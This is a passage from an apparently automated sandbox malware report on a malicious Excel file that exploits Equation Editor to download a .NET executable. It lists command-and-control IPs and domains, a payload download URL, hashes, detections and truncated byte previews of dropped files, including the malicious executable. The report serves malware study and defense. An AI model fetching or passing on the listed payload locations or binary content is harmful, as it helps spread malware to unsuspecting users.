              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
              • Exclude process from analysis (whitelisted): dllhost.exe
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              08:05:07API Interceptor60x Sleep call for process: EQNEDT32.EXE modified
              08:05:09API Interceptor214x Sleep call for process: vbc.exe modified
              08:05:37API Interceptor1171x Sleep call for process: RegAsm.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              79.134.225.90AedJpyQ9lM.exeGet hashmaliciousBrowse
                Purchase Order Price List.xlsxGet hashmaliciousBrowse
                  qdFDmi3Bhy.exeGet hashmaliciousBrowse
                    A2PlnLyOA7.exeGet hashmaliciousBrowse
                      SecuriteInfo.com.Trojan.GenericKD.37013274.28794.exeGet hashmaliciousBrowse
                        LOT_20210526.xlsxGet hashmaliciousBrowse
                          Q2MAUt4mRO.exeGet hashmaliciousBrowse
                            4fn66P5vkl.exeGet hashmaliciousBrowse
                              P_O 00041221.xlsxGet hashmaliciousBrowse
                                LOT_20210526.xlsxGet hashmaliciousBrowse
                                  Swift Copy.exeGet hashmaliciousBrowse
                                    198.12.127.155Purchase Order Price List.xlsxGet hashmaliciousBrowse
                                    • confucanism.hopto.org/new.exe

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    wekeepworking.sytes.netAedJpyQ9lM.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    Purchase Order Price List.xlsxGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    qdFDmi3Bhy.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    A2PlnLyOA7.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    SecuriteInfo.com.Trojan.GenericKD.37013274.28794.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    LOT_20210526.xlsxGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    Q2MAUt4mRO.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    4fn66P5vkl.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    P_O 00041221.xlsxGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    LOT_20210526.xlsxGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    QI5MR3pte0.exeGet hashmaliciousBrowse
                                    • 185.140.53.40
                                    5Em2NXNxSt.exeGet hashmaliciousBrowse
                                    • 185.140.53.40
                                    7Zpsd899Kf.exeGet hashmaliciousBrowse
                                    • 185.140.53.40
                                    LfgEatrwIF.exeGet hashmaliciousBrowse
                                    • 185.140.53.40

                                    ASN

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    FINK-TELECOM-SERVICESCHMS2106071066.exeGet hashmaliciousBrowse
                                    • 79.134.225.71
                                    Kangean PO.docGet hashmaliciousBrowse
                                    • 79.134.225.72
                                    facture.jarGet hashmaliciousBrowse
                                    • 79.134.225.69
                                    c3yBu1IF57.exeGet hashmaliciousBrowse
                                    • 79.134.225.92
                                    DPSGNwkO1Z.exeGet hashmaliciousBrowse
                                    • 79.134.225.25
                                    SecuriteInfo.com.Trojan.Win32.Save.a.16917.exeGet hashmaliciousBrowse
                                    • 79.134.225.94
                                    AedJpyQ9lM.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    H538065217Invoice.exeGet hashmaliciousBrowse
                                    • 79.134.225.9
                                    Purchase Order Price List.xlsxGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    P.I-84512.docGet hashmaliciousBrowse
                                    • 79.134.225.41
                                    l00VLAF9y0xQ9Vr.exeGet hashmaliciousBrowse
                                    • 79.134.225.92
                                    Swift [ref QT #U2013 2102001-R2]pdf.exeGet hashmaliciousBrowse
                                    • 79.134.225.10
                                    PO756654.exeGet hashmaliciousBrowse
                                    • 79.134.225.99
                                    qdFDmi3Bhy.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    br.exeGet hashmaliciousBrowse
                                    • 79.134.225.73
                                    Yeni sipari#U015f _WJO-001, pdf.exeGet hashmaliciousBrowse
                                    • 79.134.225.71
                                    as.exeGet hashmaliciousBrowse
                                    • 79.134.225.73
                                    11.exeGet hashmaliciousBrowse
                                    • 79.134.225.40
                                    V8IB839cvz.exeGet hashmaliciousBrowse
                                    • 79.134.225.25
                                    A2PlnLyOA7.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    AS-COLOCROSSINGUSNaro#U010dite 5039066002128.xlsxGet hashmaliciousBrowse
                                    • 192.227.228.121
                                    Proforma Inv.xlsxGet hashmaliciousBrowse
                                    • 192.3.122.169
                                    Payment_Doc.xlsxGet hashmaliciousBrowse
                                    • 107.173.219.35
                                    Purchase Order Price List.xlsxGet hashmaliciousBrowse
                                    • 198.12.127.155
                                    BBS FX.xlsxGet hashmaliciousBrowse
                                    • 198.12.110.183
                                    e#U03c2.xlsxGet hashmaliciousBrowse
                                    • 192.227.228.121
                                    Zd1j3hnY8u.exeGet hashmaliciousBrowse
                                    • 198.23.140.94
                                    MT103-payment confirmation.xlsxGet hashmaliciousBrowse
                                    • 192.210.173.40
                                    yPbGfVkUrS.exeGet hashmaliciousBrowse
                                    • 198.23.140.94
                                    Product_list.xlsxGet hashmaliciousBrowse
                                    • 192.227.158.72
                                    P_O 07062021.xlsxGet hashmaliciousBrowse
                                    • 192.3.13.56
                                    Agency Appointment for Mv TBN Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                    • 192.210.173.40
                                    Quote SEQTE00311701.xlsxGet hashmaliciousBrowse
                                    • 192.227.158.72
                                    New206745#874645_pdf.exeGet hashmaliciousBrowse
                                    • 192.3.141.183
                                    print PO#6321023.docxGet hashmaliciousBrowse
                                    • 23.95.122.53
                                    print PO#6321023.docxGet hashmaliciousBrowse
                                    • 23.95.122.53
                                    mjzvlwauGet hashmaliciousBrowse
                                    • 23.94.40.0
                                    INVOICE#1191189.xlsxGet hashmaliciousBrowse
                                    • 107.173.219.35
                                    item_list.xlsxGet hashmaliciousBrowse
                                    • 192.227.158.72
                                    _Vm064855583.HtMGet hashmaliciousBrowse
                                    • 23.94.52.94

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    C:\Users\user\AppData\Local\Temp\RegAsm.exePurchase Order Price List.xlsxGet hashmaliciousBrowse
                                      Quote QU038097.docGet hashmaliciousBrowse
                                        6Cprm97UTl.xlsGet hashmaliciousBrowse
                                          Payment_Confirmation_Slip.xlsxGet hashmaliciousBrowse
                                            Overdue Invoice.xlsxGet hashmaliciousBrowse
                                              Quotation.xlsxGet hashmaliciousBrowse
                                                ENCLOSE ORDER LIST.xlsxGet hashmaliciousBrowse
                                                  PO INV 195167 & 195324.xlsxGet hashmaliciousBrowse
                                                    Bank letter.xlsxGet hashmaliciousBrowse
                                                      Quotation.xlsxGet hashmaliciousBrowse
                                                        PO 19030004.xlsxGet hashmaliciousBrowse
                                                          New PO PO20.xlsxGet hashmaliciousBrowse
                                                            ORDER LIST.xlsxGet hashmaliciousBrowse
                                                              RFQ 00112.xlsxGet hashmaliciousBrowse
                                                                inquiry.xlsxGet hashmaliciousBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe
                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:downloaded
                                                                  Size (bytes):734208
                                                                  Entropy (8bit):7.833756558737052
                                                                  Encrypted:false
                                                                  SSDEEP:12288:iRqIue16rc2fV5hZcK1KjkiZCx7jsFuR6Y/ctiBHkcpZtoMZ:AqIue1kff/ECKwiZCx34mcC9LtoMZ
                                                                  MD5:EB43B3C033BD76B51B90A51A6726A81C
                                                                  SHA1:0D39FFCF64ED4F38EA83A72D726D40881F583014
                                                                  SHA-256:4E9A5CC90F1D17550208942E0182E9A99598C18C19B3467C184A46F4214755E2
                                                                  SHA-512:7EFB598153F2C4760FE17F7EF6510F5A48482027434B303A93439BD4C472C3D4E676E3BB8AED268277696F834DC93EA8853481D94C5FACAF61BECF4A23C17A8C
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 39%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 30%
                                                                  Reputation:low
                                                                  IE Cache URL:http://198.12.127.155/new.exe
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................(...........G... ...`....@.. ....................................@.................................PG..K....`..`............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...`....`.......*..............@..@.reloc...............2..............@..B.................G......H........S.. ;..............2............................................0.......... ........8........E....}...).......I.......8x...(....8....8t... ....~....9....&8.....:4... ....~a...:....& ....8....8/... ....~{...:....&8....(.... ....~*...9p...&8f....:....8....*8....8.......*....(....*..(0...*&~.......*...~....*..0..t........(.... ....~!...:....& ....8....8........E.... .......8....*8.... ....~q...:....&8.......9....&&8....8....}....8....~...9....8....&{....8....&8....*~...
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1717583E.jpeg
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                  Category:dropped
                                                                  Size (bytes):8815
                                                                  Entropy (8bit):7.944898651451431
                                                                  Encrypted:false
                                                                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                  MD5:F06432656347B7042C803FE58F4043E1
                                                                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\17662F27.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):79394
                                                                  Entropy (8bit):7.864111100215953
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                  MD5:16925690E9B366EA60B610F517789AF1
                                                                  SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                  SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                  SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6A2B8E08.jpeg
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                  Category:dropped
                                                                  Size (bytes):8815
                                                                  Entropy (8bit):7.944898651451431
                                                                  Encrypted:false
                                                                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                  MD5:F06432656347B7042C803FE58F4043E1
                                                                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\707074AB.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):49744
                                                                  Entropy (8bit):7.99056926749243
                                                                  Encrypted:true
                                                                  SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                  MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                  SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                  SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                  SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\81C8EEFC.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):51166
                                                                  Entropy (8bit):7.767050944061069
                                                                  Encrypted:false
                                                                  SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                  MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                  SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                  SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                  SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\86ABDEF1.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):50311
                                                                  Entropy (8bit):7.960958863022709
                                                                  Encrypted:false
                                                                  SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                                                  MD5:4141C7515CE64FED13BE6D2BA33299AA
                                                                  SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                                                  SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                                                  SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87A50956.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):51166
                                                                  Entropy (8bit):7.767050944061069
                                                                  Encrypted:false
                                                                  SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                  MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                  SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                  SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                  SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D956669.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):79394
                                                                  Entropy (8bit):7.864111100215953
                                                                  Encrypted:false
                                                                  SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                  MD5:16925690E9B366EA60B610F517789AF1
                                                                  SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                  SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                  SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CEC1BA6A.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):84203
                                                                  Entropy (8bit):7.979766688932294
                                                                  Encrypted:false
                                                                  SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                  MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                  SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                  SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                  SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                  Malicious:false
                                                                  Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E476B363.png
                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                  File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):50311
                                                                  Entropy (8bit):7.960958863022709
                                                                  Encrypted:false
